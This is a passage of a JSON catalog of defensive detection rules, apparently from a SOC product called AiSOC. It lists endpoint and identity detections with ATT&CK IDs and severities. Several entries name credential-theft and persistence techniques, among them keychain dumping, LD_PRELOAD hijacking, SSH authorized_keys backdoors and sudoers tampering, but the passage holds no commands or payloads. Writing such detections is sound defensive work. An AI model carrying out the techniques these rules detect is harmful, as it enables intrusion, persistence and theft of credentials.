tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078" ], "log_source": "mobile", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-developer-mode-enabled.yaml" }, { "id": "det-endpoint-269", "type": "detection", "name": "Untrusted Root Certificate Installed On Device", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Untrusted Root Certificate Installed On Device'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.004" ], "log_source": "mobile", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-mdm-cert-untrusted.yaml" }, { "id": "det-endpoint-270", "type": "detection", "name": "Personal Hotspot Or Bluetooth Tethering Enabled In Restricted Site", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Personal Hotspot Or Bluetooth Tethering Enabled In Restricted Site'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1011" ], "log_source": "mobile", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/mobile-bluetooth-tethering-public.yaml" }, { "id": "det-endpoint-271", "type": "detection", "name": "Host Firewall Disabled On Managed Endpoint", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Host Firewall Disabled On Managed Endpoint'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "endpoint", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-firewall-disabled-managed.yaml" }, { "id": "det-endpoint-272", "type": "detection", "name": "Network Interface Set To Promiscuous Mode", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Network Interface Set To Promiscuous Mode'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1040" ], "log_source": "endpoint", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-promiscuous-interface.yaml" }, { "id": "det-endpoint-273", "type": "detection", "name": "ARP Cache Poisoning Indicators On Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ARP Cache Poisoning Indicators On Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1557.002" ], "log_source": "endpoint", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-arp-poison-detected.yaml" }, { "id": "det-endpoint-274", "type": "detection", "name": "Suspicious LLMNR Reply Pattern (Responder-Like)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious LLMNR Reply Pattern (Responder-Like)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1557.001" ], "log_source": "endpoint", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-llmnr-replies-spoofed.yaml" }, { "id": "det-endpoint-275", "type": "detection", "name": "WPAD Probe Reaching External Resolver", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'WPAD Probe Reaching External Resolver'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1557.002" ], "log_source": "endpoint", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-wpad-probe.yaml" }, { "id": "det-endpoint-276", "type": "detection", "name": "Host Advertising As DHCP Server", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Host Advertising As DHCP Server'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1557" ], "log_source": "endpoint", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-rogue-dhcp-host.yaml" }, { "id": "det-endpoint-277", "type": "detection", "name": "mDNS Query For Non-.local Suffix", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'mDNS Query For Non-.local Suffix'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "endpoint", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-mdns-suspicious-tld.yaml" }, { "id": "det-endpoint-278", "type": "detection", "name": "UPnP/SSDP Beacons From Server Subnet", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'UPnP/SSDP Beacons From Server Subnet'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1018" ], "log_source": "endpoint", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-upnp-from-server.yaml" }, { "id": "det-endpoint-279", "type": "detection", "name": "RDP Client Saw Certificate Mismatch", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'RDP Client Saw Certificate Mismatch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1557.002" ], "log_source": "endpoint", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-rdp-mitm-cert-mismatch.yaml" }, { "id": "det-endpoint-280", "type": "detection", "name": "SCCM Client Installed From Untrusted Source", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SCCM Client Installed From Untrusted Source'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1195.002" ], "log_source": "endpoint", "playbook": "tpl-supply-chain", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-sccm-client-untrusted.yaml" }, { "id": "det-endpoint-281", "type": "detection", "name": "AMoS Stealer Virtual Machine Detection via osquery", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AMoS Stealer Virtual Machine Detection via osquery'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.002" ], "log_source": "osquery", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-amos-stealer-vm-check.yaml" }, { "id": "det-endpoint-282", "type": "detection", "name": "macOS Data Chunking via dd or split", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Data Chunking via dd or split'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1030" ], "log_source": "osquery", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-data-chunking.yaml" }, { "id": "det-endpoint-283", "type": "detection", "name": "macOS Gatekeeper Bypass Attempt", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Gatekeeper Bypass Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-gatekeeper-bypass.yaml" }, { "id": "det-endpoint-284", "type": "detection", "name": "Suspicious PlistBuddy LaunchAgent Modification", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious PlistBuddy LaunchAgent Modification'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-suspicious-plistbuddy.yaml" }, { "id": "det-endpoint-285", "type": "detection", "name": "Baron Samedit CVE-2021-3156 Exploit Attempt", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Baron Samedit CVE-2021-3156 Exploit Attempt'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1068" ], "log_source": "osquery", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-linux-baron-samedit-cve-2021-3156.yaml" }, { "id": "det-endpoint-286", "type": "detection", "name": "Linux osqueryd Service Stop Detected via auditd", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Linux osqueryd Service Stop Detected via auditd'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1489" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-linux-auditd-service-stop.yaml" }, { "id": "det-endpoint-287", "type": "detection", "name": "macOS Local User Account Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Local User Account Created'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1136.001" ], "log_source": "osquery", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-account-created.yaml" }, { "id": "det-endpoint-288", "type": "detection", "name": "macOS Hidden File or Directory Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Hidden File or Directory Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1564.001" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-hidden-file-directory.yaml" }, { "id": "det-endpoint-289", "type": "detection", "name": "macOS Kernel Extension Loaded via kextload", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Kernel Extension Loaded via kextload'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-kextload.yaml" }, { "id": "det-endpoint-290", "type": "detection", "name": "macOS Keychain Dumping Attempt", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Keychain Dumping Attempt'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1555.001" ], "log_source": "osquery", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-keychain-dump.yaml" }, { "id": "det-endpoint-291", "type": "detection", "name": "macOS System Log Removed or Manually Rotated", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS System Log Removed or Manually Rotated'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-log-removal.yaml" }, { "id": "det-endpoint-292", "type": "detection", "name": "macOS LoginHook Persistence via defaults write", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS LoginHook Persistence via defaults write'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1037.002" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-loginhook-persistence.yaml" }, { "id": "det-endpoint-293", "type": "detection", "name": "macOS Suspicious Living-Off-The-Land Binary Execution", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Suspicious Living-Off-The-Land Binary Execution'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "osquery", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-lolbin-execution.yaml" }, { "id": "det-endpoint-294", "type": "detection", "name": "macOS Network Share Discovery via showmount or smbutil", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Network Share Discovery via showmount or smbutil'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1135" ], "log_source": "osquery", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-network-share-discovery.yaml" }, { "id": "det-endpoint-295", "type": "detection", "name": "macOS Plist Modification via plutil", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Plist Modification via plutil'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1647" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-plutil-plist-modification.yaml" }, { "id": "det-endpoint-296", "type": "detection", "name": "Process Tapping macOS Keyboard Events", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Tapping macOS Keyboard Events'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1056.001" ], "log_source": "osquery", "playbook": "tpl-collection", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/osquery-macos-keyboard-event-tap.yaml" }, { "id": "det-endpoint-297", "type": "detection", "name": "Sensitive System File Modified (FIM)", "description": "A file in a sensitive system path (/etc/passwd, /etc/shadow, /etc/sudoers, /etc/crontab, /etc/hosts, /etc/ssh/sshd_config, /etc/ld.so.*) was created, deleted, or modified as reported by osquery file_events via the AiSOC FIM pipeline. Adversaries commonly target these files for credential theft (T1003.008), persistence (T1037, T1053.003), lateral movement, and privilege escalation (T1548.001).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.008", "T1037", "T1053.003", "T1548.001" ], "log_source": "osquery", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-sensitive-file-modified.yaml" }, { "id": "det-endpoint-298", "type": "detection", "name": "Executable Dropped in World-Writable Directory (FIM)", "description": "An osquery file_events CREATED event was recorded for a file with a common executable extension (.sh, .py, .pl, .rb, .elf, .bin, no extension + executable path) under a world-writable path (/tmp, /var/tmp, /dev/shm, /run/shm). 
This is a classic indicator of malware staging, web shell deployment, or attacker tool transfer (T1027, T1059, T1036.005).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1027", "T1059", "T1036.005", "T1570" ], "log_source": "osquery", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-binary-dropped-writable-dir.yaml" }, { "id": "det-endpoint-299", "type": "detection", "name": "LD_PRELOAD / ld.so.preload Tampered (FIM)", "description": "The dynamic linker preload file /etc/ld.so.preload or any shared library under /etc/ld.so.conf.d/ was created or modified, as detected by osquery file_events via the AiSOC FIM pipeline. Attackers use ld.so.preload to inject arbitrary shared libraries into every process at startup, achieving rootkit-level stealth, credential capture, or privilege escalation (T1574.006 \u2013 Dynamic Linker Hijacking).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1574.006", "T1014", "T1548.001" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-ld-preload-modified.yaml" }, { "id": "det-endpoint-300", "type": "detection", "name": "SSH authorized_keys File Modified (FIM)", "description": "An osquery file_events event recorded a change (CREATED, UPDATED, or ATTRIBUTES_MODIFIED) to any ~/.ssh/authorized_keys file across the fleet. 
Adversaries add their own public keys to authorized_keys files to establish persistent SSH backdoors that survive password resets and remain invisible to normal login monitoring (T1098.004 \u2013 Account Manipulation: SSH Authorized Keys).", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white", "data_source.osquery", "data_source.fim" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004", "T1078", "T1136" ], "log_source": "osquery", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/fim-ssh-authorized-keys-changed.yaml" }, { "id": "det-endpoint-301", "type": "detection", "name": "Sudoers Tampering Via auditd Watch", "description": "Triggers when the AiSOC auditd profile (profiles/auditd/aisoc.rules)\nrecords a write to /etc/sudoers or any file under /etc/sudoers.d/.\nPivots on the auditd_key field exposed by services/connectors/app/connectors/auditd.py\nso the rule fires regardless of which syscall (open, openat, rename, etc.)\nproduced the event. Sudoers changes are extremely high-signal in steady-state\nand are the most reliable indicator of attacker-driven privilege escalation\nshort of a full root shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.003", "T1098" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-sudoers-tampering.yaml" }, { "id": "det-endpoint-302", "type": "detection", "name": "SSH Config Or Authorized Keys Tampering Via auditd Watch", "description": "Triggers when the AiSOC auditd profile records a write to /etc/ssh/sshd_config,\n/etc/ssh/sshd_config.d/, or /root/.ssh/authorized_keys. 
Pivots on the\nauditd_key field so the rule fires for any modify-class syscall (open, openat,\nrename, link, unlink) without needing a per-syscall companion rule.\nSSH config + root authorized_keys are the two most common backdoor footholds\non Linux servers; production hosts should see zero modifications outside of\nconfig-management runs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004", "T1556" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-ssh-config-tampering.yaml" }, { "id": "det-endpoint-303", "type": "detection", "name": "Kernel Module Load Or Unload Via auditd Watch", "description": "Triggers when the AiSOC auditd profile records init_module / finit_module /\ndelete_module syscalls or execution of /sbin/insmod, /sbin/rmmod, /sbin/modprobe.\nPivots on auditd_key so the rule fires regardless of how the kernel module\nprimitive was invoked. Loadable kernel modules are the standard delivery\nvehicle for Linux rootkits (Diamorphine, Reptile, Symbiote, etc.); legitimate\nmodule loads are dominated by boot-time systemd-modules-load.service and\nfilesystem drivers and should be easy to allowlist by parent process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547.006", "T1014" ], "log_source": "linux", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-kernel-module-load.yaml" }, { "id": "det-endpoint-304", "type": "detection", "name": "Systemd Unit Persistence Via auditd Watch", "description": "Triggers when the AiSOC auditd profile records a write under\n/etc/systemd/system/ or /lib/systemd/system/. 
Pivots on auditd_key so the\nrule fires for any modify-class syscall on a unit file without a per-syscall\ncompanion rule. Dropping a .service or .timer file under these directories is\nthe canonical Linux persistence technique post-foothold; legitimate writes\nare dominated by package managers and configuration-management agents and\nshould be straightforward to allowlist.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1543.002", "T1053.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/linux-auditd-systemd-persistence.yaml" }, { "id": "det-identity-001", "type": "detection", "name": "Authentication Brute-Force Burst", "description": "Detects high-frequency failed authentication attempts against a single account, which is a classic indicator of credential-stuffing or password-spraying attempts. Threshold is intentionally conservative to reduce noise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.001" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/brute-force-login.yaml" }, { "id": "det-identity-002", "type": "detection", "name": "Impossible Travel Between Two Authentications", "description": "Detects two successful authentication events for the same user from geographically distant locations within a time window that would require travel speeds exceeding 800 km/h. 
Strong indicator that compromised credentials are in concurrent use by an attacker and the legitimate user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/impossible-travel.yaml" }, { "id": "det-identity-003", "type": "detection", "name": "Password Spray Across Many Users from Single IP", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Password Spray Across Many Users from Single IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1110.003" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/password-spray.yaml" }, { "id": "det-identity-004", "type": "detection", "name": "Login from Tor / Anonymous Proxy", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login from Tor / Anonymous Proxy'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-anonymous-ip.yaml" }, { "id": "det-identity-005", "type": "detection", "name": "Privileged Login Outside Business Hours", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Login Outside Business Hours'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-outside-business-hours.yaml" }, { "id": "det-identity-006", "type": "detection", "name": "Login from Country Outside Allowed Geography", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login from Country Outside Allowed Geography'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-from-foreign-country.yaml" }, { "id": "det-identity-007", "type": "detection", "name": "Authentication Attempt Against Disabled Account", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication Attempt Against Disabled Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/disabled-account-login-attempt.yaml" }, { "id": "det-identity-008", "type": "detection", "name": "MFA Push Bombing (MFA Fatigue)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Push Bombing (MFA Fatigue)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1621" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/mfa-fatigue.yaml" }, { "id": "det-identity-009", "type": "detection", "name": "MFA Requirement Removed from User Policy", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'MFA Requirement Removed from User Policy'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "identity", "mitre_techniques": [ "T1556.006" ], "log_source": "okta", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/mfa-bypass-policy-change.yaml" }, { "id": "det-identity-010", "type": "detection", "name": "Authentication with Expired Credential", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication with Expired Credential'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1110" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/expired-credential-reuse.yaml" }, { "id": "det-identity-011", "type": "detection", "name": "Service Account Used for Interactive Login", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Service Account Used for Interactive Login'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.004" ], "log_source": "okta", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/service-account-interactive-login.yaml" }, { "id": "det-identity-012", "type": "detection", "name": "Root SSH Login on Production Host", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Root SSH Login on Production Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/root-ssh-login.yaml" }, { "id": "det-identity-013", "type": "detection", "name": "Login with Vendor Default Credentials", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Login with Vendor Default Credentials'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "identity", "mitre_techniques": [ "T1078.001" ], "log_source": "linux", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/default-credential-login.yaml" }, { "id": "det-identity-014", "type": "detection", "name": "Shared Account Login Spike (Distinct IPs)", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Shared Account Login Spike (Distinct IPs)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/shared-account-login-spike.yaml" }, { "id": "det-identity-015", "type": "detection", "name": "Authentication During Active P0/P1 Incident Window", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Authentication During Active P0/P1 Incident Window'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "identity", "mitre_techniques": [ "T1078" ], "log_source": "okta", "playbook": "tpl-incident-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/identity/login-during-incident.yaml" }, { "id": "det-identity-016", "type": "detection", "name": "Privileged Role Assignment", "description": "AiSOC v1 curated detection. Triggers on the identity signal described by 'Privileged Role Assignment'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": 